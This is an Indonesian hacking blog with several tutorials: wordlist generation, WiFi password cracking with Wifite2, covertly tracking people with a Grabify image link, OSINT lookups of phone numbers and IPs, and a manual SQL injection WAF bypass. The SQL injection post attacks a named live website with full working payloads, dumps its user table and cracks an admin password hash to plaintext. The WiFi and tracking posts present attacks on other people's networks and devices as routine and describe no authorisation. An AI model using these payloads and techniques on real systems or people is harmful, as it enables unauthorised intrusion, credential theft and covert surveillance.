Selasa, 30 Juni 2020

Cara Membuat Wordlist sendiri

      Bro? Kalian sehat kan? Bagi yang pacaran semoga langgeng, dan bagi yang jomblo mari berkumpul ahahaha :v, back lagi di blog aing DemonX, setelah kemarin gua share tentang tutorial hack wifi, sekarang gua mau share lagi cara buat wordlist, nantinya wordlist ini bisa di custom sendiri oleh kalian. Langsung aja ke caranya

1. About cupp

Bentuk otentikasi yang paling umum adalah kombinasi nama pengguna dan kata sandi atau frasa sandi. Jika kedua nilai kecocokan disimpan dalam tabel yang disimpan secara lokal, pengguna diautentikasi untuk koneksi. Kekuatan kata sandi adalah ukuran dari kesulitan dalam menebak atau menghancurkan kata sandi melalui teknik kriptografi atau pengujian otomatis nilai-nilai alternatif yang berbasis perpustakaan.

Kata sandi yang lemah mungkin sangat pendek atau hanya menggunakan karakter alfanumerik, membuat dekripsi menjadi sederhana. Kata sandi yang lemah juga bisa menjadi kata yang mudah ditebak oleh seseorang yang membuat profil pengguna, seperti ulang tahun, nama panggilan, alamat, nama hewan peliharaan atau kerabat, atau kata umum seperti Tuhan, cinta, uang atau kata sandi.

Itulah mengapa CUPP lahir, dan dapat digunakan dalam situasi seperti tes penetrasi hukum atau investigasi kejahatan forensik.



2. Installasi Cupp

Disini pertama tama kalian cloning tools githubnya https://github.com/Mebus/cupp :

root@localhost:~# git clone https://github.com/Mebus/cupp 

Kalo udah kalian masuk ke directory nya 

root@localhost:~# cd cupp
root@localhost:~/cupp# ls     (Untuk Nampilkan List)

Selanjutnya kalian berikan akses ke file cupp.py dengan ketik perintah

root@localhost:~/cupp# chmod +x cupp.py 

Dan terakhir kalian jalankan perintah

root@localhost:~/cupp# ./cupp.py -i



kalian isi List nya sesuai keinginan kalian

Example:




Nanti hasilnya akan di simpan di dalam folder cuppnya
kalo mau liat tinggal kalian ketik ls

3. About Mentalist

Mentalist adalah alat grafis untuk pembuatan daftar kata kustom. Itu menggunakan paradigma manusia umum untuk membangun kata sandi dan dapat menampilkan daftar kata lengkap serta aturan yang kompatibel dengan Hashcat dan John the Ripper.

4. Installasi mentalist

Yang ke empat kita install mentalist nya lewat github:

Remember: Kalian Install Lagi diluar directory cupp 

root@localhost:~/cupp# cd   (cd doang ya lur)

root@localhost:~# git clone https://github.com/sc0tfree/mentalist.git 
  
Terus kalian masuk ke dalam folder mentalist nya 

root@localhost:~# cd mentalist
root@localhost:~mentalist# ls

Nah saat kalian ketik "ls" pasti bakal ada file setup.py, kalian install setup.py dengan perintah:


root@localhost:~/mentalist# python3 setup.py install


Kalo udah, kalian tinggal ketik


root@localhost;~/mentalist# mentalist

kalo udah, bakal muncul window baru dari mentalist nya 




Nah tinggal kalian custom sendiri, caranya kalian klik ikon + di sebelah base word,Like This:





Disitu kalian klik ikon + di sebelah base words dan terserah kalian mau bikin apa aja xixixi

Kalo mau tambah attribute, kalian klik icon + di kanan atas, yang sudah saya custom:



kalo udah siap, tinggal di save, klik di kanan atas "Load/Save"


Kalian tentukan dulu letak gambarnya, kalo gua sih mau save di file cupp, caranya kalian klik tanda minus di atas  nya dan tentuin letak nya




kalo udah tinggal klik save dan saya coba cek di directory cupp nya:



Dan BBBOOOOOMMMMMM!!!!1

Selanjutnya terserah kalian mau digunakan untuk apa wordlistnya xixixi

Segitu dulu dah bikin wordlist nya yang mudah :v kalo mau dibikin manual ya gak papa hehehe

Kalo ada yang mau ditanyain tulis di kolom komentar ya

Rabu, 24 Juni 2020

Information Gathering dengan Blue Thunder

      Halo guys, sekarang gua mau share tentang Blue Thunder Tools. Tools ini untuk melacak dan memberikan informasi tentang suatu address. Ok Demon mau basa basi dulu

1. About Blue Thunder

    Ambil informasi tentang alamat ip atau nama host Alat ini ditulis dalam bentuk perl karena Anda dapat memberi tahu -_- Anda dapat membantu kami dengan berlangganan ke saluran youtube kami:. https://goo.gl/FpAkp5.: sebelum membuka alat gunakan perintah ini chmod + x blue_thunder_IP_locator.pl tidak ada yang istimewa itu hanya memberikan informasi dari situs web ini http://ip-api.com/ periksa terima kasih telah menggunakan alat kami.

Dikutip dari Developer: the shadow brokerss

2. Installasi Tools
   
A. root@localhost:~# apt install liblocal-lib-perl libjson-perl



Nah antara package yang satu dengan seterusnya dikasih spasi ya lur :v 
FYI: Jangan lupa pakai perintah "sudo" sebagai akses root, atau kalo ga mau ribet ngetik "sudo" langsung masuk ke root nya dengan perintah "sudo su" jadi yang sebelumnya kalian ketik "sudo apt-get ...." langsung menjadi "apt-get ....."

B. root@localhost:~# apt-get upgrade libjson-perl 



NB: Untuk Termux sama saja penginstallannya

C. root@localhost:~# git clone https://github.com/theshadowbrokerss/Blue-Thunder-IP-Locator-

 

Dan Kalo sudah, kalian masuk ke directory nya dengan ketik perintah:

root@localhost:~# cd Blue-Thunder-IP-Locator-

Dan ketik perintah "ls" untuk menampilkan list

beri akses untuk file blue_thunder.py dengan ketik perintah

root@localhost:~# chmod +x blue_thunder.py

Kalo kalian ga mau ribet, cukup ketik perintah:

root@localhost:~# chmod +x *

D. Running script

Kalo kalian ga mau kasih akses yang lebih mudah, kalian harus jalankan sesuai bahasanya, karena menggunakan bahasa perl makanya format file .pl

root@localhost:~# perl blue_thunder.pl 

E. Menentukan Target

Untuk nentuin target ada banyak cara, tapi gua disini bakal menggunakan lbd (Tools Bawaan kali)

root@localhost:~# lbd www.detik.com

Nanti bakal keluar IP Server 

Checking for DNS-Loadbalancing: FOUND
detik.com has address 103.49.221.211
detik.com has address 203.190.242.211

Checking for HTTP-Loadbalancing [Server]:
 dtk24
 dtk10
 FOUND

Checking for HTTP-Loadbalancing [Date]: 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:40, 08:54:40, 08:54:40, 08:54:40, 08:54:40, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:42, 08:54:42, 08:54:42, 08:54:42, 08:54:42, NOT FOUND

Checking for HTTP-Loadbalancing [Diff]: FOUND
< Server: dtk24
> Server: dtk10

detik.com does Load-balancing. Found via Methods: DNS HTTP[Server] HTTP[Diff]  


kalo server nya ga ke detect, cari target lain :v

dtk24 IP Server: 103.49.221.211
dtk10 IP Server: 203.190.242.211

bebas mau yang mana aja, tapi gua mau scan yang depannya 103 

root@localhost:~# perl blue_thunder.py 103.49.221.211



Dan Enter

3. Google Maps

Nanti bakal keluar geo lat dan geo longitude dan kalian pastekan di google maps like this

  
Ok lur, itu aja yang mau gua share. kalo ada yang mau ditanyain, tulis di kolom komentar ya

Senin, 22 Juni 2020

Tutorial Hack Wifi dengan Wifite2

      Hallo guys, sekarang aing mau share tentang cara Hack Wifi dengan tools Wifite2. Supaya kalian bisa monitoring mode nya, harus pakai Wifi Adapter. kalo pake wireless compat doang mah ya ga bisa, kalo mau berhasil harus ada usaha A6. carding misalnya aowkwkwkw. Nah disini gua sih pake TL WN722N sebagai wlan0 nya. Kalo ga ada wireless adapter nya gimana Demon? ya ga bisa monitor mode.

1. About Wifite

Repo ini adalah penulisan ulang lengkap wifite, skrip Python untuk mengaudit jaringan nirkabel.

Wifite menjalankan alat audit nirkabel yang ada untuk Anda. Hentikan menghafal argumen perintah & beralih!

Wifite dirancang untuk menggunakan semua metode yang dikenal untuk mengambil kata sandi dari titik akses nirkabel (router). Metode-metode ini meliputi:

    WPS: Serangan Offline Pixie-Dust
    WPS: Serangan PIN Brute-Force Online
    WPA: Tangkapan Jabat Tangan WPA + celah offline.
    WPA: Retakan Hash PMKID + luring offline.
    WEP: Berbagai serangan yang diketahui terhadap WEP, termasuk fragmentasi, chop-chop, aireplay, dll.

Jalankan wifite, pilih target Anda, dan Wifite akan secara otomatis mulai mencoba menangkap atau memecahkan kata sandi.
 


2. Installasi

A. Tools Pendukung

Sebelumnya, kalian harus install beberapa tools dibawah ini sebagai pendukung yang hukumnya fardu ain :v
 
tshark: Untuk mendeteksi jaringan WPS dan memeriksa file pengambilan jabat tangan.
    reaver: Untuk serangan WPS Pixie-Dust & brute-force.
        Catatan: Alat cuci Reaver dapat digunakan untuk mendeteksi jaringan WPS jika tshark tidak ditemukan.
    bully: Untuk serangan WPS Pixie-Dust & brute-force.
        Alternatif untuk Reaver. Tentukan --bully untuk menggunakan Bully, bukan Reaver.
        Bully juga digunakan untuk mengambil PSK jika reaver tidak dapat setelah memecahkan PIN WPS.
    coWPAtty: Untuk mendeteksi tangkapan jabat tangan.
    pyrit: Untuk mendeteksi tangkapan jabat tangan.
    hashcat: Untuk memecahkan hash PMKID.
        hcxdumptool: Untuk mengambil hash PMKID.
        hcxpcaptool: Untuk mengkonversi paket PMKID ke dalam format hashcat.
 



FYI: Yang belum di install di Kali adalah hcxdumptool dan hcxpcaptool
hcxdumptool: https://github.com/ZerBea/hcxdumptool
hcxpcaptool:  https://github.com/ZerBea/hcxtools 

Jalankan dengan perintah:

kali@kali:~$ sudo git clone (link diatas)    ~tidak sebagai super user (root)
root@localhost:~# git clone (link diatas)   ~sebagai super user (root)

B. Install github

Untuk install github nya:

:~# git clone https://github.com/derv82/wifite2


:~# cd wifite2

Jika sudah masuk ke direktori nya ketik:

:~# ls

:~# chmod +x Wifite.py

FYI chmod berfungsi untuk mempermudah kita menjalankan script, karena untuk menjalankan script pasti pakai bahasa program, tapi kita hanya perlu ketik " ./ " didepannya untuk mempersingkat

C. Pastikan Semuanya siap

Hal yang perlu diperhatikan sebelum melakukan aksi :v

> wireless interface dalam keadaan monitor 

kenapa gitu mon? Karena kalo dalam keadaan "managed" atau "auto" ga bakal bisa deteksi wireless disekitar kita, caranya gimana mon?

;~# iwconfig wlan0 mode monitor

Like this:

 

> ifconfig interface dalam keadaan up

kenapa lagi tuh mon? kalo ifconfig interface dalam keadaan down, ga papa juga, cuma lebih baik di up saja, caranya gimana?

:~# ifconfig <interface> up

karena interface aing wlan0 jadinya

:~# ifconfig wlan0 up

Like this:


 > Wordlist

      Kalo dari bawaan wifitenya sudah ada wordlist nya, coba kalian "ls" akan ada file yang namanya "wordlist-probable.txt" tapi kalo mau di custom dengan wordlist lain, bisa kalian tumpuk, atau file bawaan di hapus dan diganti dengan wordlist kalian, lusa demon share tentang cara bikin wordlist bikinan sendiri ea :v 

Cara modif default wordlist supaya jadi wordlist kita gimana bang?

kalian download dulu wordlist nya disini
bisa melalui git atau zip, kalo zip kalian klik tulisan "clone or download' yang back ground nya hijau dan klik download zip

kalo udah kalian masuk ke folder Downloads kalian

:~# cd /home/usernamekalian/Downloads

karena usernamenya tazmanian jadi gua masuk dgn ketik

:~# cd /home/tazmanian/Downloads

Nah nanti bakal ada file format .zip yang udah kalian install

cara nya kalian ketik:

:~# unzip indonesian-wordlist-master.zip

Like this:



Nah kalian masuk ke folder yang udah kalian unzip

:~# cd indonesian-wordlist-master

Dan kalian ketik "ls" untuk nampilin list, Kalo udah kalian copy ke folder wifite2 yang berada di akses root tadi dengan ketik perintah:

:~# cp 00-indonesian-wordlist.lst /root/wifite2

Lakukan sampai wordlist yang ke enam, lakukan berulang kali lur xixixi  dan kalian masuk ke directory wifite2 tadi dan ketikan "ls"

Dan jangan lupa kalian hapus file bawaannya yaitu wordlist-probable.txt dengan perintah:

:~# rm -rf wordlist-probable.txt

Selanjutnya kalian edit nama file dengan perintah:

:~# nano 00-indonesian-wordlist.lst 

Dan keluar dengan ketik di Host Key anda Ctrl + X, Save modified buffer? Klik Y Y, file name kalian ubah menjadi "wordlist-probable.txt", save file under different name? klik Y di hostkey

D. Waktunya tempur

Kalian ketik:

:~# ./Wifite.py 

tunggu sampai target anda muncul



kalo sudah muncul tekan tombol Ctrl + c di keyboard anda dan pilih nomer target yang mau kalian retas :v  disini gua pake essid "tazmanian xploit" dgn nomer 1, jadi gw ketik angka 1

Selanjutnya akan ada 5 tahap, menurut gua 4 tahap yang lainnya ga terlalu penting,  yang terpenting adalah tahap ke 5

Like this:



Tahap 5 adalah proses deauth dan saat target memasukkan password akan terekam di layar kita dan akan langsung menjalankan wordlist nya yang sudah diedit tadi, jika client dari Access Point sudah memasukkan password nya, akan otomatis di brute force :v dan result nya:


NB: Kita menggunakan wordlist untuk menebak hasil capture handshake nya, kalo password belom ke crack, anda harus menggunakan wordlist lain sampai benar benar ke crack :v

Sekian dulu dari aing DemonX, kalo ada yang mau ditanyain hubungin DemonX

kalo ada saran atau request silahkan tulis di kolom commentar ya :v

Sabtu, 20 Juni 2020

Cara Melacak Orang Dengan Menggunakan HTML

      Yoo guys, welcome back di blog DemonX. Dunia maya lagi dihebohkan dengan pelacakan orang dengan menggunakan HTML. Ya Hyper Text Markup Language. Pasti pada bingung kan? gua juga awalnya heran kok bisa eh setelah gua tau dari salah satu sahabat gua ternyata begitu hehehe. Langsung aja ke caranya skuy :v

1. Siapkan Script HTML (Struktur dasar nya saja)

Nah kalian siapin dulu script HTML terdiri dari :

<html>
<head>
<title>Cara Lacak Orang Dengan HTML :v>
</head>
<body>
<img src="">
</body>
</html> 

2. Tentukan link gambar yang mau disisipin 

Nah kedua siapin link gambar kalian, disini gua ambil dari google:

https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=imgres&cd=&cad=rja&uact=8&ved=2ahUKEwj_z5-3jI3qAhUUVH0KHTLpCVoQjRx6BAgBEAQ&url=https%3A%2F%2Fwww.bola.com%2Fragam%2Fread%2F4258324%2F7-meme-kucing-lucu-terkait-cinta-bikin-susah-nahan-tawa&psig=AOvVaw3abTxaC6QyiCIX0ujCEvK-&ust=1592629249837474 


Ini gambarnya:



Karena kepanjangan jadinya gua pake bit.ly:

https://bit.ly/3hHFaTb

3. Masuk GrabiFy dan pastekan link gambar nya
  
Nah kalian pastekan link bit.ly kalian agar bisa untuk track orangnya seperti ini:




4. Masukan link dari grabify ke dalam bahasa HTML tadi


<html>
<head>
<title>Cara Lacak Orang Dengan HTML :v>
</head>
<body>
<img src="https://grabify.link/6GGLKR">
</body>
</html> 

Contoh:


Dan kalian kasih ke targetnya, gua bakal coba ke HP gua sendiri:



Dan saat gua klik



Langsung ke track ya :v

Ok sekian dulu tutorial DemonX, Kalo ada yang mau ditanyain silahkan tulis di kolom komentar

Jumat, 29 Mei 2020

Cara install RED_HAWK di Kali Linux

Cara Install RED_HAWK di Kali Linux



       Welcomeback di blog DemonX xixixi, sekarang gua mau jelasin dikit cara install RED_HAWK serta pemasangannya. RED_HAWK adalah tools pentest untuk scan website, bisa melakukan information gathering sampai scan open port. Tools ini dibuat oleh Tuhinshubhra. Ok langsung aja ke caranya.

1. Buka terminal dan cloning github

Pertama, kalian buka terminal Kali Linux kalian, dan paste kan: 

root@demonx:~# git clone https://github.com/Tuhinshubhra/RED_HAWK



 2. Masuk ke Directory nya dan jalankan

Kalo sudah kalian masuk ke Directory dengan perintah "cd RED_HAWK", lalu kalian ketik perintah  

root@demonx:~# php rhawk.php

kalo udah, akan keluar seperti ini:




  3. Masukkan target kita

Nah untuk targetnya, terserah kalian. Disini Demon contohin website:



Lalu enter


4. Pastikan kalian ketik "U" agar tidak ketinggalan update dan ketik "F" untuk fix part missing agar tidak terjadi error :v

Kalo sudah, kalian tinggal pilih salah 1, atau langsung scan semua dengan perintah "A" dan hasilnya:


Ok, sekian dulu dari DemonX, kalo ada yang mau ditanyain silahkan di kolom komentar :v atau mau PC DemonX bisa:

Sabtu, 23 Mei 2020

Tutorial Phone Infoga 2020

     Tutorial Phone Infoga 2020 new update 

      Besok kan udah idul Fitri, Demon selaku Lead TazManianDevil Cyber Team, dan perwakilan keluarga besar saya, mengucapkan minal aidin wal faizin mohon maaf lahir dan batin. Ok sesuai judul, Demon mau bahas tentang tools phone infoga. Script aslinya yaitu sundowndev sudah tidak terlalu leluasa saat menggunakan modules OSINT, alhasil terblokir oleh google, tapi banyak duplicate Script dari developer lain, hanya bisa scan secara general saja. karena Demon sekarang  installnya dengan menggunakan file berformat tar. Ok langsung aja caranya:

1. Install file tar PhoneInfoga dari github

Caranya, kalian dork di google "phone infoga release" dan pilih dari website github.



Disini Demon pilih yang PhoneInfoga_Linux_X86_64.tar.gz atau bisa kalian klik disini

2. Open terminal 


Lalu masuk ke folder Downloads kalian, dan ketikan perintah:

tar xfv PhoneInfoga_Linux_x86_64.tar.gz Seperti gambar diatas

3. Eksekusi PhoneInfoga

Untuk bantuan eksekusi, kalian bisa ketik:

./phoneinfoga --help 

dan disini Demon mau langsung scan nomer saja 

./phoneinfoga scan -n <nomerhp>

    and its work. 

4. Eksekusi tambahan

kalian ketik:

./phoneinfoga serve -p 8081 seperti gambar:


 

  dan kalian masuk ke web browser lalu ketik:

localhost:8081 port nya tergantung yang kalian masukkan tadi, karena Demon pake port 8081 jadi localhost:8081, seperti gambar ini:


dan coba kalian masukkan nomer HP nya, disini Demon pakai nomer luar untuk bahannya.

201030304285 (gak tau nomer siapa Demon pake aja :v)

dan resultnya:

  

Ini adalah datanya, dan untuk mencoba nya Demon pake google footprints, yang ini:


Tinggal kalian klik yang mana aja bebas, otomatis akan membuka window baru .

Nah ini result nya;

 
Ok lur, sekian dulu ea dari demon, kalo ada yang mau ditanyakan hubungin Demon dibawah:

disini Untuk whatsapp

Selasa, 19 Mei 2020

Tutorial SQL Injection Bypass WAF

       Halo guys welcome back with DemonX, sekarang Demon mau bahas SQL injection manual bypass WAF, buat kalian yang ga tau WAF itu apa. WAF adalah Website Application Firewall yang artinya website tersebut memiliki keamanan yang kuat, namun bukan berarti tidak bisa di retas heheh :v

Dork: "inurl: .php?id=" 
NB: tanpa tanda petik lur 

itu adalah dork global, dan belum dikembangkan lagi. Silahkan kalian kembangkan sendiri ea :v ga perlu panjang yang penting efektif

Nah btw Demon udah ada live target yang cocok nih :v

http://www.interaliaproject.com/news.php?id=115

1. Nah itu live target Demon, coba kalian berikan tanda petik dibelakang ( ' )


2. dan muncul pesan error, kita lanjutkan dengan eksekusi order by dari yang tidak error sampe error

http://www.interaliaproject.com/news.php?id=115' order by 7--+-



3. Nah disini Demon nemu error di order by yang ke tujuh, berarti web tsb. hanya memiliki 6 table saja, lanjut kita masukan union select sampai 6 kali

http://www.interaliaproject.com/news.php?id=115' union select 1,2,3,4,5,6--+-

dan muncul pesan error




4. Masukkan kode injeksi ini:

/*!12345union*/+/*!12345select*/

tepat dibelakang tanda ( ' ) contoh:

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,2,3,4,5,6--+-

Dan enter ..


Nah disini kita udah bisa nemuin togel nya :v

5. Kalian pilih saja diantara salah 1 angka itu dan kalo kalian mau tau databasenya caranya adalah:

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,2,database(),4,5,6--+-

Demon pakai angka 3 dan akan keluar database nya adalah: interali_project

6. Dump Tabel dari database

Disini Demon mau dump pakai DIOS (Dump In One Shot), DIOS nya:

/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)

caranya kita sisipin di salah 1 angka togelnya, demon pakai di angka 2

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),database(),4,5,6--+-


 7. Dump Username dan Password

Selanjutnya adalah dump username dan password, dengan cara kalian ubah information_schema.columns menjadi tabel nya, dan ubah table_name serta column_name menjadi masing masing username dan password sehingga menjadi seperti ini:

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345usertable*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@),database(),4,5,6--+-



Disini kita dapat username dan password yang masih terenkripsi, demon mau coba hash yang bawah aja dari username antonis

md5:

cd64c618627016120817ca5eaeb9a29e

8. Decrypt md5

Untuk decrypt, bisa disini



dan password yang terenkripsi sudah kita hash: psiouras



9. Mencari admin login

Untuk hal ini, silahkan kalian cari sendiri lur :v jangan manja manja xixixi ...


Kalo ada yang mau ditanyakan, hubungi DemonX

Minggu, 17 Mei 2020

Cara mengatasi repository tidak bisa update dan upgrade pada Kali Linux

       Hallo guys, welcome back di blog DemonX. Bagi kalian yang belum install Kali Linux bisa liat di part sebelumnya. Penyebab Kali Linux tidak bisa update dan upgrade terletak pada repository nya.

A. Apa itu repository

Repository adalah semacam gudang untuk semua package. Kalo tidak ada package apa yang mau di update dan di upgrade? xixixi

B. Cara Edit Repository


1. Masuk ke sudo su (Untuk Mendapat akses root)
2. Ketik "cd" (Untuk Masuk root acces secara keseluruhan)
3. Ketikan perintah root@kali:~# nano /etc/apt/sources.list Lalu enter

 4. Tampilan default akan seperti ini
  
Kaliimat yang diawali # adalah komentar dan tidak akan dieksekusi oleh system, boleh dihapus semua atau dibiarkan tapi ditambah dengan command repository .

5. Masukkan repository berikut

deb http://http.kali.org/kali kali-rolling main contrib non-free ~Line 1
deb-src http://http.kali.org/kali kali-rolling main contrib non-free~Line 2


Seperti gambar dibawah ini:


6. Tekan ctrl + x (untuk keluar, lalu save dan tekan y)

7. Coba update dan upgrade



Dan ternyata sudah bisa update (Karena Demon udah update jadi langsung done) dan sudah bisa upgrade xixixi :v

kalo ada yang mau ditanyakan silahkan tulis di kolom komentar

Highlited Post By DemonX

Intip Dunia IT secara Universal

       Hello guys ini postingan perdana Demon untuk blogspot, sekarang demon mau basa basi dulu seputar Hacking dan dunia IT. Saat ini kedu...